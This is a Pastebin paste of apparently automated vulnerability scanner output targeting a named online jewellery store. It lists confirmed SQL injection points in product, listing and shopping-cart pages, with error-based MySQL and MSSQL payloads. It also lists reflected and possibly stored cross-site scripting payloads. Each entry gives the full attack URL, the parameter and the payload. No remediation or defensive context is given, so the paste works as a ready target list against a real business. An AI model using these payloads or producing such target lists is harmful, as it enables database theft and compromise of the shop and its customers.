Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&category=43
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=NSFTW
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: NSFTW
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/newarival.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/Featured.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/products.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27&category=43
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: color
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: productid
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: size
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: save
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?del=%27&id=2310
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: del
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?cancel=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cancel
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: save
- Parameter Type: Querystring
- Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x0000E2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0000E2)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x000150)</script>&category=43
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000150)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: '" ns=alert(0x0002D5)
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://zebaishjewellers.com/shoppingcart.php
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement